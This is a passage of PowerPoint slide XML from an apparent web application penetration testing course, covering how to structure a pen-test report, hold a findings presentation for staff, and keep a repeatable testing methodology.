                <a:gd name="T26" fmla="*/ 20210 w 21600"/>
                <a:gd name="T27" fmla="*/ 1597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a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="123912" name="Puzzle1"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1824" y="1091"/>
              <a:ext cx="1800" cy="10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6084 w 21600"/>
                <a:gd name="T25" fmla="*/ 2569 h 21600"/>
                <a:gd name="T26" fmla="*/ 16128 w 21600"/>
                <a:gd name="T27" fmla="*/ 195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p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>1) Executive Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124931" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1645920"/>
            <a:ext cx="8382000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This section contains a high-level overview of our test and findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We need to target the biggest impact because the audience for this section is typically higher-level personnel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Keep it short – Maximum 1.5 pages, but try to fit on a single page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Contains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Critical findings are a must</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Determine the root cause of findings and outline it here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In a web app pen test, these root causes often involve required changes to the web app development process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Recommendations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reasonable and accomplishable goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Overarching solutions if possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Recommended timeframes – short-term fixes versus long-term changes</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>2) Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125955" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Should outline the parts of the test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Explain the scope</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Include any restrictions or special requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Define the objective of the test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For example, if the application owner was only interested in the security of the authentication system, say so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>List the team with contact information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>List both testing personnel and the points of contact within the target organization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typically, this section is 1 to 2 pages in length</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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>3) Methodology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126979" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502920" y="1630680"/>
            <a:ext cx="8077200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Describe the methodology used during the test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Step-by-step, including the tools used at each step</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Customize for the specific test and its findings – don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t just use boilerplate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Your goal should be enough depth so that a competent penetration tester could verify and repeat your work …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>… and a competent security pro who isn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t a pen tester can at least understand your process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This section often runs 3 to 10 pages in length, depending on the depth of the test</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>4) Findings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128003" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1584960"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The section contains the meat of the report</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Each finding is listed, categorized according to its risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>High/Medium/Low risk, as well as Notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>You may also want to include an indication of the likelihood that a given flaw will be exploited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Customize risk categories if target organization personnel use different terms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sometimes the findings need to be divided by application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>When testing multiple applications with different audiences of developers and security personnel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Recommendations are part of the findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>You may have multiple methods for dealing with a given finding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>List each one of them, and identify which one is most beneficial for the target organization and why</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>5) Conclusions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1615440"/>
            <a:ext cx="8686800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Conclusions are the final piece</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Very short section similar to the executive summary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reiterates the executive summary … </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But from a perspective of answering the technicians who will fix the issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Any appendixes are added after the conclusion, potentially including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Permission memo(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Lists of users harvested</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Records retrieved from the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Detailed tool output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685800" y="137160"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Presentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259080" y="1584960"/>
            <a:ext cx="8534400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is an optional part of most penetration tests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But some organizations require it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Excellent way to work with developers to improve security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Information exchange from tester to developers, and vice versa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Audience should be chosen by target personnel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>May contain various types of staff:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Administrators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Testing staff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Consider holding multiple presentations focused on different types of staff</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19075" y="121920"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Characteristics of a Solid Web App Pen Test Methodology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1630680"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Since a scattershot approach fails!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Our methodology must be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Proven: Track Record</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Repeatable: Developers (and other testers) can reproduce our results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Explainable: We must express discovered problems and fixes in an understandable manner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is another focus for today</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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
